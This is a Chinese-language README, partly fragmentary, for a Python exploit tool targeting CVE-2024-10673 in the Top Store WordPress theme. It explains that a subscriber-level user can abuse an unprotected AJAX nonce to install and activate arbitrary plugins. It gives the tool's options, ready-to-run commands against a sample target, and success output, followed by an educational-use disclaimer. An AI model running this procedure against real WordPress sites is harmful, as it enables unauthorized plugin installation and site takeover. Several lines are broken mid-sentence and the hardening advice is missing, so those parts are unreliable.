该脚本利用 CVE-2024-10673,这是 Top Store WordPress 主题(<= 1.5.4) 中发现的一个严重漏洞。该漏洞允许拥有订阅者(subscriber)级别或更高权限的已认证用户通过未受保护的 AJAX 请求安装和激活任意插件。
nonce。themes.php?page=thunk_started 提取 AJAX nonce。hunk-companion 或用户自定义插件)。usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to install and activate (default: hunk-companion)
hunk-companion):
python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
woocommerce):
python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}
为确保您的 WordPress 站点安全:
此脚本仅用于教育和安全研究目的。 未经授权对您不拥有或未经明确许可测试的系统使用是违法的。请负责任地使用!
作者:Khaled Alenazi(Nxploit)